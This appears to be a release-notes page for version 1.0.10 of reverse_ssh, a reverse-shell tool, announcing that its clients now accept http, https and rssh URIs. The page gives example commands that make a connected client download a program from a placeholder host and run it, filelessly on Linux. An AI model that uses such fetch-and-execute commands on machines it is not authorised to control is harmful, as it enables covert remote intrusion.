github NHAS/reverse_ssh v1.0.10

latest releases: v2.6.4, v2.6.3, v2.6.2...
24 months ago

This release incorporates a number of small changes and bug fixes. The most notable feature is that the rssh clients now support URI scheme handlers.

connect --shell https://your.host/program <rssh_client_id>
ssh -J your.rssh.server:3232 <rssh_client_id> https://your.host/program 

This allows the rssh client to download additional resources to execute instead of on-host executable (this will also attempt to download resources in a fileless way on linux.)

Features

  • Clients now support http/https/rssh URI schemes when connecting to clients

Bug Fixes

Don't miss a new reverse_ssh release

NewReleases is sending notifications on new releases.